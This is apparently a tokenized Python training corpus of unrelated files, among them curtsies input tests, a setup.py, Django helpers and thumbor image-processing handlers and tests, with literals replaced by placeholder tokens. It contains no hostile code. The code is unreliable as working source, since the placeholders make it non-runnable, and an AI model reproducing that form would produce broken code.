( ) <EOL> inp . unprocessed_bytes = [ ] <EOL> inp . _wait_for_read_ready_or_timeout = Mock ( ) <EOL> inp . _wait_for_read_ready_or_timeout . return_value = ( True , None ) <EOL> inp . _nonblocking_read = Mock ( ) <EOL> n = inp . paste_threshold + <NUM_LIT:1> <EOL> first_time = [ True ] <EOL> def side_effect ( ) : <EOL> if first_time : <EOL> inp . unprocessed_bytes . extend ( [ b'<STR_LIT:a>' ] * n ) <EOL> first_time . pop ( ) <EOL> return n <EOL> else : <EOL> return None <EOL> inp . _nonblocking_read . side_effect = side_effect <EOL> r = inp . send ( <NUM_LIT:0> ) <EOL> self . assertEqual ( type ( r ) , events . PasteEvent ) <EOL> self . assertEqual ( r . events , [ u'<STR_LIT:a>' ] * n ) <EOL> def test_event_trigger ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . event_trigger ( CustomEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> f ( ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:0> ) ) , CustomEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> def test_schedule_event_trigger ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . scheduled_event_trigger ( CustomScheduledEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> f ( when = time . time ( ) ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:0> ) ) , CustomScheduledEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> f ( when = time . time ( ) + <NUM_LIT> ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:0> ) ) , CustomScheduledEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> def test_schedule_event_trigger_blocking ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . scheduled_event_trigger ( CustomScheduledEvent ) <EOL> f ( when = time . time ( ) + <NUM_LIT> ) <EOL> self . assertEqual ( type ( next ( inp ) ) , CustomScheduledEvent ) <EOL> def test_threadsafe_event_trigger ( self ) : <EOL> inp = Input ( ) <EOL> f = inp . threadsafe_event_trigger ( CustomEvent ) <EOL> def check_event ( ) : <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:1> ) ) , CustomEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> t = threading . Thread ( target = check_event ) <EOL> t . start ( ) <EOL> f ( ) <EOL> t . join ( ) <EOL> def test_interrupting_sigint ( self ) : <EOL> inp = Input ( sigint_event = True ) <EOL> def send_sigint ( ) : <EOL> os . kill ( os . getpid ( ) , signal . SIGINT ) <EOL> with inp : <EOL> t = threading . Thread ( target = send_sigint ) <EOL> t . start ( ) <EOL> self . assertEqual ( type ( inp . send ( <NUM_LIT:1> ) ) , events . SigIntEvent ) <EOL> self . assertEqual ( inp . send ( <NUM_LIT:0> ) , None ) <EOL> t . join ( ) </s>
<s> from __future__ import with_statement <EOL> import os . path <EOL> import setuptools <EOL> MISC_DIR = "<STR_LIT>" <EOL> REQUIREMENT_DIR = "<STR_LIT>" <EOL> with open ( "<STR_LIT>" ) as fp : <EOL> long_description = fp . read ( ) <EOL> with open ( os . path . join ( MISC_DIR , "<STR_LIT>" ) ) as f : <EOL> summary = f . read ( ) <EOL> with open ( os . path . join ( REQUIREMENT_DIR , "<STR_LIT>" ) ) as f : <EOL> install_requires = [ line . strip ( ) for line in f if line . strip ( ) ] <EOL> with open ( os . path . join ( REQUIREMENT_DIR , "<STR_LIT>" ) ) as f : <EOL> tests_require = [ line . strip ( ) for line in f if line . strip ( ) ] <EOL> setuptools . setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> description = summary , <EOL> keywords = [ "<STR_LIT>" ] , <EOL> long_description = long_description , <EOL> license = "<STR_LIT>" , <EOL> include_package_data = True , <EOL> packages = setuptools . find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> install_requires = install_requires , <EOL> setup_requires = [ "<STR_LIT>" ] , <EOL> tests_require = tests_require , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . wsgi import get_wsgi_application <EOL> application = get_wsgi_application ( ) </s>
<s> def ical2text ( ical_string ) : <EOL> import vobject <EOL> result = [ ] <EOL> if isinstance ( ical_string , str ) : <EOL> parsedCal = vobject . readOne ( ical_string ) <EOL> else : <EOL> try : <EOL> parsedCal = vobject . readOne ( ical_string ) <EOL> except : <EOL> parsedCal = vobject . readOne ( ical_string . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> for event in parsedCal . getChildren ( ) : <EOL> if event . name == '<STR_LIT>' : <EOL> if hasattr ( event , '<STR_LIT>' ) : <EOL> start = event . dtstart . value . strftime ( '<STR_LIT>' ) <EOL> else : <EOL> start = '<STR_LIT>' <EOL> if hasattr ( event , '<STR_LIT>' ) : <EOL> end = event . dtend . value . strftime ( '<STR_LIT>' ) <EOL> else : <EOL> end = start <EOL> if start == end : <EOL> date_str = start <EOL> else : <EOL> date_str = '<STR_LIT>' % ( start , end ) <EOL> result . append ( '<STR_LIT>' % ( date_str , event . summary . value ) ) <EOL> return '<STR_LIT:\n>' . join ( result ) </s>
<s> import logging <EOL> import importlib <EOL> from django . apps import apps <EOL> from django . core . exceptions import MiddlewareNotUsed <EOL> from django . utils . lru_cache import lru_cache <EOL> from django . utils . module_loading import module_has_submodule <EOL> from . import app_settings <EOL> def configure_logging ( level , format , filename ) : <EOL> """<STR_LIT>""" <EOL> logging . root . handlers = [ ] <EOL> handler = logging . StreamHandler ( ) <EOL> if filename : <EOL> handler = logging . handlers . WatchedFileHandler ( filename ) <EOL> handler . setFormatter ( logging . Formatter ( format ) ) <EOL> logging . root . addHandler ( handler ) <EOL> if level is not None : <EOL> logging . root . setLevel ( level ) <EOL> return handler . stream . fileno ( ) <EOL> @ lru_cache ( ) <EOL> def get_path ( path ) : <EOL> module_name , attr = path . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> module = importlib . import_module ( module_name ) <EOL> return getattr ( module , attr ) <EOL> @ lru_cache ( ) <EOL> def get_backend ( ) : <EOL> return get_path ( app_settings . BACKEND ) ( ) <EOL> @ lru_cache ( ) <EOL> def get_middleware ( ) : <EOL> middleware = [ ] <EOL> for path in app_settings . MIDDLEWARE : <EOL> try : <EOL> middleware . append ( get_path ( path ) ( ) ) <EOL> except MiddlewareNotUsed : <EOL> pass <EOL> return middleware <EOL> def import_all_submodules ( name ) : <EOL> for app_config in apps . get_app_configs ( ) : <EOL> app_module = app_config . module <EOL> try : <EOL> importlib . import_module ( '<STR_LIT>' % ( app_module . __name__ , name ) ) <EOL> except ImportError : <EOL> if module_has_submodule ( app_module , name ) : <EOL> raise <EOL> try : <EOL> import setproctitle <EOL> original_title = setproctitle . getproctitle ( ) <EOL> def set_process_title ( * titles ) : <EOL> setproctitle . setproctitle ( "<STR_LIT>" % ( <EOL> original_title , <EOL> '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % x for x in titles ) , <EOL> ) ) <EOL> except ImportError : <EOL> def set_process_title ( * titles ) : <EOL> pass </s>
<s> from preggy import expect <EOL> from tests . base import FilterTestCase <EOL> class FillFilterTestCase ( FilterTestCase ) : <EOL> def test_fill_filter_with_fixed_color ( self ) : <EOL> def config_context ( context ) : <EOL> context . request . fit_in = True <EOL> context . request . width = <NUM_LIT> <EOL> context . request . height = <NUM_LIT> <EOL> image = self . get_filtered ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> config_context = config_context <EOL> ) <EOL> expected = self . get_fixture ( '<STR_LIT>' ) <EOL> ssim = self . get_ssim ( image , expected ) <EOL> expect ( ssim ) . to_be_greater_than ( <NUM_LIT> ) <EOL> def test_fill_filter_with_average ( self ) : <EOL> def config_context ( context ) : <EOL> context . request . fit_in = True <EOL> context . request . width = <NUM_LIT> <EOL> context . request . height = <NUM_LIT> <EOL> image = self . get_filtered ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> config_context = config_context <EOL> ) <EOL> expected = self . get_fixture ( '<STR_LIT>' ) <EOL> ssim = self . get_ssim ( image , expected ) <EOL> expect ( ssim ) . to_be_greater_than ( <NUM_LIT> ) </s>
<s> import base64 <EOL> import hmac <EOL> import hashlib <EOL> from unittest import TestCase <EOL> from preggy import expect <EOL> from thumbor . url_signers . base64_hmac_sha1 import ( <EOL> UrlSigner <EOL> ) <EOL> class Base64HmacSha1UrlSignerTestCase ( TestCase ) : <EOL> def test_can_create_signer ( self ) : <EOL> signer = UrlSigner ( security_key = "<STR_LIT>" ) <EOL> expect ( signer ) . to_be_instance_of ( UrlSigner ) <EOL> expect ( signer . security_key ) . to_equal ( '<STR_LIT>' ) <EOL> def test_can_sign_url ( self ) : <EOL> signer = UrlSigner ( security_key = "<STR_LIT>" ) <EOL> url = '<STR_LIT>' <EOL> expected = base64 . urlsafe_b64encode ( <EOL> hmac . new ( <EOL> '<STR_LIT>' , unicode ( url ) . encode ( '<STR_LIT:utf-8>' ) , hashlib . sha1 <EOL> ) . digest ( ) <EOL> ) <EOL> actual = signer . signature ( url ) <EOL> expect ( actual ) . to_equal ( expected ) </s>
<s> from thumbor . filters import BaseFilter , filter_method <EOL> from thumbor . ext . filters import _colorize <EOL> class Filter ( BaseFilter ) : <EOL> @ filter_method ( BaseFilter . PositiveNumber , BaseFilter . PositiveNumber , BaseFilter . PositiveNumber , BaseFilter . String ) <EOL> def colorize ( self , red_pct , green_pct , blue_pct , fill ) : <EOL> fill_r , fill_g , fill_b = tuple ( map ( ord , fill . decode ( '<STR_LIT>' ) ) ) <EOL> mode , data = self . engine . image_data_as_rgb ( ) <EOL> imgdata = _colorize . apply ( mode , red_pct , green_pct , blue_pct , fill_r , fill_g , fill_b , data ) <EOL> self . engine . set_image_data ( imgdata ) </s>
<s> from urllib import quote , unquote <EOL> from thumbor . handlers import ContextHandler <EOL> from thumbor . context import RequestParameters <EOL> import tornado . gen as gen <EOL> import tornado . web <EOL> class ImagingHandler ( ContextHandler ) : <EOL> def compute_etag ( self ) : <EOL> if self . context . config . ENABLE_ETAGS : <EOL> return super ( ImagingHandler , self ) . compute_etag ( ) <EOL> else : <EOL> return None <EOL> @ gen . coroutine <EOL> def check_image ( self , kw ) : <EOL> if self . context . config . MAX_ID_LENGTH > <NUM_LIT:0> : <EOL> exists = yield gen . maybe_future ( self . context . modules . storage . exists ( kw [ '<STR_LIT:image>' ] [ : self . context . config . MAX_ID_LENGTH ] ) ) <EOL> if exists : <EOL> kw [ '<STR_LIT:image>' ] = kw [ '<STR_LIT:image>' ] [ : self . context . config . MAX_ID_LENGTH ] <EOL> url = self . request . path <EOL> kw [ '<STR_LIT:image>' ] = quote ( kw [ '<STR_LIT:image>' ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> if not self . validate ( kw [ '<STR_LIT:image>' ] ) : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return <EOL> kw [ '<STR_LIT>' ] = self . request <EOL> self . context . request = RequestParameters ( ** kw ) <EOL> has_none = not self . context . request . unsafe and not self . context . request . hash <EOL> has_both = self . context . request . unsafe and self . context . request . hash <EOL> if has_none or has_both : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % url ) <EOL> return <EOL> if self . context . request . unsafe and not self . context . config . ALLOW_UNSAFE_URL : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % url ) <EOL> return <EOL> if self . context . config . USE_BLACKLIST : <EOL> blacklist = yield self . get_blacklist_contents ( ) <EOL> if self . context . request . image_url in blacklist : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % self . context . request . image_url ) <EOL> return <EOL> url_signature = self . context . request . hash <EOL> if url_signature : <EOL> signer = self . context . modules . url_signer ( self . context . server . security_key ) <EOL> url_to_validate = url . replace ( '<STR_LIT>' % self . context . request . hash , '<STR_LIT>' ) . replace ( '<STR_LIT>' % quote ( self . context . request . hash ) , '<STR_LIT>' ) <EOL> valid = signer . validate ( unquote ( url_signature ) , url_to_validate ) <EOL> if not valid and self . context . config . STORES_CRYPTO_KEY_FOR_EACH_IMAGE : <EOL> security_key = yield gen . maybe_future ( self . context . modules . storage . get_crypto ( self . context . request . image_url ) ) <EOL> if security_key is not None : <EOL> signer = self . context . modules . url_signer ( security_key ) <EOL> valid = signer . validate ( url_signature , url_to_validate ) <EOL> if not valid : <EOL> self . _error ( <NUM_LIT> , '<STR_LIT>' % url ) <EOL> return <EOL> self . execute_image_operations ( ) <EOL> @ tornado . web . asynchronous <EOL> def get ( self , ** kw ) : <EOL> self . check_image ( kw ) <EOL> @ tornado . web . asynchronous <EOL> def head ( self , ** kw ) : <EOL> self . check_image ( kw ) </s>
<s> import math <EOL> import sys <EOL> from thumbor . point import FocalPoint <EOL> from thumbor . utils import logger <EOL> import tornado . gen as gen <EOL> trim_enabled = True <EOL> try : <EOL> from thumbor . ext . filters import _bounding_box <EOL> except ImportError : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> trim_enabled = False <EOL> class Transformer ( object ) : <EOL> def __init__ ( self , context ) : <EOL> self . context = context <EOL> self . engine = self . context . request . engine <EOL> self . target_height = None <EOL> self . target_width = None <EOL> def _calculate_target_dimensions ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> source_width = float ( source_width ) <EOL> source_height = float ( source_height ) <EOL> if not self . context . request . width and not self . context . request . height : <EOL> self . target_width = source_width <EOL> self . target_height = source_height <EOL> else : <EOL> if self . context . request . width : <EOL> if self . context . request . width == "<STR_LIT>" : <EOL> self . target_width = source_width <EOL> else : <EOL> self . target_width = float ( self . context . request . width ) <EOL> else : <EOL> self . target_width = self . engine . get_proportional_width ( self . context . request . height ) <EOL> if self . context . request . height : <EOL> if self . context . request . height == "<STR_LIT>" : <EOL> self . target_height = source_height <EOL> else : <EOL> self . target_height = float ( self . context . request . height ) <EOL> else : <EOL> self . target_height = self . engine . get_proportional_height ( self . context . request . width ) <EOL> def get_target_dimensions ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . target_height is None : <EOL> self . _calculate_target_dimensions ( ) <EOL> return int ( self . target_width ) , int ( self . target_height ) <EOL> def adjust_focal_points ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> self . focal_points = None <EOL> if self . context . request . focal_points : <EOL> if self . context . request . should_crop : <EOL> self . focal_points = [ ] <EOL> crop = self . context . request . crop <EOL> for point in self . context . request . focal_points : <EOL> if point . x < crop [ '<STR_LIT:left>' ] or point . x > crop [ '<STR_LIT:right>' ] or point . y < crop [ '<STR_LIT>' ] or point . y > crop [ '<STR_LIT>' ] : <EOL> continue <EOL> point . x -= crop [ '<STR_LIT:left>' ] or <NUM_LIT:0> <EOL> point . y -= crop [ '<STR_LIT>' ] or <NUM_LIT:0> <EOL> self . focal_points . append ( point ) <EOL> else : <EOL> self . focal_points = self . context . request . focal_points <EOL> if not self . focal_points : <EOL> self . focal_points = [ <EOL> FocalPoint . from_alignment ( self . context . request . halign , <EOL> self . context . request . valign , <EOL> source_width , <EOL> source_height ) <EOL> ] <EOL> self . engine . focus ( self . focal_points ) <EOL> def transform ( self , callback ) : <EOL> self . done_callback = callback <EOL> if self . context . config . RESPECT_ORIENTATION : <EOL> self . engine . reorientate ( ) <EOL> self . trim ( ) <EOL> self . smart_detect ( ) <EOL> def trim ( self ) : <EOL> is_gifsicle = ( self . context . request . engine . extension == '<STR_LIT>' and self . context . config . USE_GIFSICLE_ENGINE ) <EOL> if self . context . request . trim is None or not trim_enabled or is_gifsicle : <EOL> return <EOL> mode , data = self . engine . image_data_as_rgb ( ) <EOL> box = _bounding_box . apply ( <EOL> mode , <EOL> self . engine . size [ <NUM_LIT:0> ] , <EOL> self . engine . size [ <NUM_LIT:1> ] , <EOL> self . context . request . trim_pos , <EOL> self . context . request . trim_tolerance , <EOL> data <EOL> ) <EOL> if box [ <NUM_LIT:2> ] < box [ <NUM_LIT:0> ] or box [ <NUM_LIT:3> ] < box [ <NUM_LIT:1> ] : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> return <EOL> self . engine . crop ( box [ <NUM_LIT:0> ] , box [ <NUM_LIT:1> ] , box [ <NUM_LIT:2> ] + <NUM_LIT:1> , box [ <NUM_LIT:3> ] + <NUM_LIT:1> ) <EOL> if self . context . request . should_crop : <EOL> self . context . request . crop [ '<STR_LIT:left>' ] -= box [ <NUM_LIT:0> ] <EOL> self . context . request . crop [ '<STR_LIT>' ] -= box [ <NUM_LIT:1> ] <EOL> self . context . request . crop [ '<STR_LIT:right>' ] -= box [ <NUM_LIT:0> ] <EOL> self . context . request . crop [ '<STR_LIT>' ] -= box [ <NUM_LIT:1> ] <EOL> @ property <EOL> def smart_storage_key ( self ) : <EOL> return self . context . request . image_url <EOL> def smart_detect ( self ) : <EOL> is_gifsicle = ( self . context . request . engine . extension == '<STR_LIT>' and self . context . config . USE_GIFSICLE_ENGINE ) <EOL> if ( not ( self . context . modules . detectors and self . context . request . smart ) ) or is_gifsicle : <EOL> self . do_image_operations ( ) <EOL> return <EOL> try : <EOL> self . should_run_image_operations = False <EOL> self . running_smart_detection = True <EOL> self . do_smart_detection ( ) . result ( ) <EOL> self . running_smart_detection = False <EOL> except Exception : <EOL> if not self . context . config . IGNORE_SMART_ERRORS : <EOL> raise <EOL> logger . exception ( "<STR_LIT>" ) <EOL> if self . context . config . USE_CUSTOM_ERROR_HANDLING : <EOL> self . context . modules . importer . error_handler . handle_error ( <EOL> context = self . context , <EOL> handler = self . context . request_handler , <EOL> exception = sys . exc_info ( ) <EOL> ) <EOL> self . context . request . prevent_result_storage = True <EOL> self . context . request . detection_error = True <EOL> self . do_image_operations ( ) <EOL> if self . should_run_image_operations : <EOL> self . do_image_operations ( ) <EOL> @ gen . coroutine <EOL> def do_smart_detection ( self ) : <EOL> focal_points = yield gen . maybe_future ( self . context . modules . storage . get_detector_data ( self . smart_storage_key ) ) <EOL> if focal_points is not None : <EOL> self . after_smart_detect ( focal_points , points_from_storage = True ) <EOL> else : <EOL> detectors = self . context . modules . detectors <EOL> detectors [ <NUM_LIT:0> ] ( self . context , index = <NUM_LIT:0> , detectors = detectors ) . detect ( self . after_smart_detect ) <EOL> def after_smart_detect ( self , focal_points = [ ] , points_from_storage = False ) : <EOL> for point in focal_points : <EOL> self . context . request . focal_points . append ( FocalPoint . from_dict ( point ) ) <EOL> if self . context . request . focal_points and self . context . modules . storage and not points_from_storage : <EOL> storage = self . context . modules . storage <EOL> points = [ ] <EOL> for point in self . context . request . focal_points : <EOL> points . append ( point . to_dict ( ) ) <EOL> storage . put_detector_data ( self . smart_storage_key , points ) <EOL> if self . running_smart_detection : <EOL> self . should_run_image_operations = True <EOL> return <EOL> self . do_image_operations ( ) <EOL> def img_operation_worker ( self ) : <EOL> if '<STR_LIT>' == self . context . request . engine . extension and '<STR_LIT>' in self . context . request . filters : <EOL> self . extract_cover ( ) <EOL> self . manual_crop ( ) <EOL> self . _calculate_target_dimensions ( ) <EOL> self . adjust_focal_points ( ) <EOL> if self . context . request . debug : <EOL> self . debug ( ) <EOL> else : <EOL> if self . context . request . fit_in : <EOL> self . fit_in_resize ( ) <EOL> else : <EOL> self . auto_crop ( ) <EOL> self . resize ( ) <EOL> self . flip ( ) <EOL> def do_image_operations ( self ) : <EOL> """<STR_LIT>""" <EOL> def inner ( future ) : <EOL> self . done_callback ( ) <EOL> self . context . thread_pool . queue ( <EOL> operation = self . img_operation_worker , <EOL> callback = inner <EOL> ) <EOL> def extract_cover ( self ) : <EOL> self . engine . extract_cover ( ) <EOL> def manual_crop ( self ) : <EOL> if self . context . request . should_crop : <EOL> def limit ( dimension , maximum ) : <EOL> return min ( max ( dimension , <NUM_LIT:0> ) , maximum ) <EOL> source_width , source_height = self . engine . size <EOL> crop = self . context . request . crop <EOL> crop [ '<STR_LIT:left>' ] = limit ( crop [ '<STR_LIT:left>' ] , source_width ) <EOL> crop [ '<STR_LIT>' ] = limit ( crop [ '<STR_LIT>' ] , source_height ) <EOL> crop [ '<STR_LIT:right>' ] = limit ( crop [ '<STR_LIT:right>' ] , source_width ) <EOL> crop [ '<STR_LIT>' ] = limit ( crop [ '<STR_LIT>' ] , source_height ) <EOL> if crop [ '<STR_LIT:left>' ] >= crop [ '<STR_LIT:right>' ] or crop [ '<STR_LIT>' ] >= crop [ '<STR_LIT>' ] : <EOL> self . context . request . should_crop = False <EOL> crop [ '<STR_LIT:left>' ] = crop [ '<STR_LIT:right>' ] = crop [ '<STR_LIT>' ] = crop [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> return <EOL> self . engine . crop ( crop [ '<STR_LIT:left>' ] , crop [ '<STR_LIT>' ] , crop [ '<STR_LIT:right>' ] , crop [ '<STR_LIT>' ] ) <EOL> def auto_crop ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> target_height = self . target_height or <NUM_LIT:1> <EOL> target_width = self . target_width or <NUM_LIT:1> <EOL> source_ratio = round ( float ( source_width ) / source_height , <NUM_LIT:2> ) <EOL> target_ratio = round ( float ( target_width ) / target_height , <NUM_LIT:2> ) <EOL> if source_ratio == target_ratio : <EOL> return <EOL> focal_x , focal_y = self . get_center_of_mass ( ) <EOL> if self . target_width / source_width > self . target_height / source_height : <EOL> crop_width = source_width <EOL> crop_height = int ( round ( source_width * self . target_height / target_width , <NUM_LIT:0> ) ) <EOL> else : <EOL> crop_width = int ( round ( math . ceil ( self . target_width * source_height / target_height ) , <NUM_LIT:0> ) ) <EOL> crop_height = source_height <EOL> crop_left = int ( round ( min ( max ( focal_x - ( crop_width / <NUM_LIT:2> ) , <NUM_LIT:0.0> ) , source_width - crop_width ) ) ) <EOL> crop_right = min ( crop_left + crop_width , source_width ) <EOL> crop_top = int ( round ( min ( max ( focal_y - ( crop_height / <NUM_LIT:2> ) , <NUM_LIT:0.0> ) , source_height - crop_height ) ) ) <EOL> crop_bottom = min ( crop_top + crop_height , source_height ) <EOL> self . engine . crop ( crop_left , crop_top , crop_right , crop_bottom ) <EOL> def flip ( self ) : <EOL> if self . context . request . horizontal_flip : <EOL> self . engine . flip_horizontally ( ) <EOL> if self . context . request . vertical_flip : <EOL> self . engine . flip_vertically ( ) <EOL> def get_center_of_mass ( self ) : <EOL> total_weight = <NUM_LIT:0.0> <EOL> total_x = <NUM_LIT:0.0> <EOL> total_y = <NUM_LIT:0.0> <EOL> for focal_point in self . focal_points : <EOL> total_weight += focal_point . weight <EOL> total_x += focal_point . x * focal_point . weight <EOL> total_y += focal_point . y * focal_point . weight <EOL> x = total_x / total_weight <EOL> y = total_y / total_weight <EOL> return x , y <EOL> def resize ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> if self . target_width == source_width and self . target_height == source_height : <EOL> return <EOL> self . engine . resize ( self . target_width or <NUM_LIT:1> , self . target_height or <NUM_LIT:1> ) <EOL> def fit_in_resize ( self ) : <EOL> source_width , source_height = self . engine . size <EOL> if self . context . request . adaptive and ( <EOL> ( source_width - source_height < <NUM_LIT:0> and self . target_width - self . target_height > <NUM_LIT:0> ) or <EOL> ( source_width - source_height > <NUM_LIT:0> and self . target_width - self . target_height < <NUM_LIT:0> ) <EOL> ) : <EOL> tmp = self . context . request . width <EOL> self . context . request . width = self . context . request . height <EOL> self . context . request . height = tmp <EOL> tmp = self . target_width <EOL> self . target_width = self . target_height <EOL> self . target_height = tmp <EOL> sign = <NUM_LIT:1> <EOL> if self . context . request . full : <EOL> sign = - <NUM_LIT:1> <EOL> if sign == <NUM_LIT:1> and self . target_width >= source_width and self . target_height >= source_height : <EOL> return <EOL> if source_width / self . target_width * sign >= source_height / self . target_height * sign : <EOL> resize_height = round ( source_height * self . target_width / source_width ) <EOL> resize_width = self . target_width <EOL> else : <EOL> resize_height = self . target_height <EOL> resize_width = round ( source_width * self . target_height / source_height ) <EOL> self . engine . resize ( resize_width , resize_height ) <EOL> def debug ( self ) : <EOL> if not self . context . request . focal_points : <EOL> return <EOL> for point in self . context . request . focal_points : <EOL> if point . width <= <NUM_LIT:1> : <EOL> point . width = <NUM_LIT:10> <EOL> if point . height <= <NUM_LIT:1> : <EOL> point . height = <NUM_LIT:10> <EOL> self . engine . draw_rectangle ( int ( point . x - ( point . width / <NUM_LIT:2> ) ) , <EOL> int ( point . y - ( point . height / <NUM_LIT:2> ) ) , <EOL> point . width , <EOL> point . height ) </s>
<s> from pyvows import Vows , expect <EOL> from thumbor . storages . no_storage import Storage as NoStorage <EOL> from fixtures . storage_fixture import IMAGE_URL , IMAGE_BYTES <EOL> @ Vows . batch <EOL> class NoStorageVows ( Vows . Context ) : <EOL> class CanStoreImage ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> storage . put ( IMAGE_URL % <NUM_LIT:1> , IMAGE_BYTES ) <EOL> return storage . get ( IMAGE_URL % <NUM_LIT:1> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_null ( ) <EOL> class KnowsNoImages ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> return storage . exists ( IMAGE_URL % <NUM_LIT:1> ) <EOL> def should_be_false ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_false ( ) <EOL> class RemovesImage ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> return storage . remove ( IMAGE_URL % <NUM_LIT:1> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic ) . to_be_null ( ) <EOL> class StoresCrypto ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> storage . put_crypto ( IMAGE_URL % <NUM_LIT:2> ) <EOL> return storage . get_crypto ( IMAGE_URL % <NUM_LIT:2> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_null ( ) <EOL> class DetectorData ( Vows . Context ) : <EOL> def topic ( self ) : <EOL> storage = NoStorage ( None ) <EOL> storage . put_detector_data ( IMAGE_URL % <NUM_LIT:3> , "<STR_LIT>" ) <EOL> return storage . get_detector_data ( IMAGE_URL % <NUM_LIT:3> ) <EOL> def should_be_null ( self , topic ) : <EOL> expect ( topic . result ( ) ) . to_be_null ( ) </s>
<s> from cabu . exceptions import HeaderException <EOL> class Headers ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config ) : <EOL> self . driver_name = config [ '<STR_LIT>' ] <EOL> self . headers = config [ '<STR_LIT>' ] <EOL> def set_headers ( self , profile ) : <EOL> """<STR_LIT>""" <EOL> self . profile = profile <EOL> for header_key , header_value in self . headers . items ( ) : <EOL> self . profile = self . set_header ( header_key , header_value ) <EOL> return self . profile <EOL> def set_header ( self , header_key , header_value ) : <EOL> """<STR_LIT>""" <EOL> if self . driver_name == '<STR_LIT>' : <EOL> header_key = header_key . lower ( ) . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> self . profile . set_preference ( '<STR_LIT>' % header_key , header_value ) <EOL> elif self . driver_name == '<STR_LIT>' : <EOL> self . profile [ "<STR_LIT>" % header_key ] = ( <EOL> header_value <EOL> ) <EOL> else : <EOL> raise HeaderException ( '<STR_LIT>' ) <EOL> return self . profile </s>
<s> import sys <EOL> import re <EOL> from gdcmdtools . base import BASE_INFO <EOL> from gdcmdtools . base import DEBUG_LEVEL <EOL> from gdcmdtools . get import GDGet <EOL> from gdcmdtools . get import export_format <EOL> import argparse <EOL> from argparse import RawTextHelpFormatter <EOL> from pprint import pprint <EOL> import logging <EOL> logger = logging . getLogger ( ) <EOL> __THIS_APP = '<STR_LIT>' <EOL> __THIS_DESCRIPTION = '<STR_LIT>' <EOL> __THIS_VERSION = BASE_INFO [ "<STR_LIT:version>" ] <EOL> def test ( ) : <EOL> assert True <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arg_parser = argparse . ArgumentParser ( <EOL> description = '<STR_LIT>' % <EOL> ( __THIS_APP , <EOL> __THIS_VERSION , <EOL> __THIS_DESCRIPTION , <EOL> BASE_INFO [ "<STR_LIT>" ] , <EOL> BASE_INFO [ "<STR_LIT:description>" ] ) , <EOL> formatter_class = RawTextHelpFormatter ) <EOL> arg_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> help_export_format = "<STR_LIT:\n>" . join ( <EOL> [ <EOL> re . search ( <EOL> "<STR_LIT>" , <EOL> k ) . group ( <NUM_LIT:1> ) + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT:U+002CU+0020>" . join ( <EOL> export_format [ k ] ) for k in export_format . iterkeys ( ) ] ) <EOL> arg_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 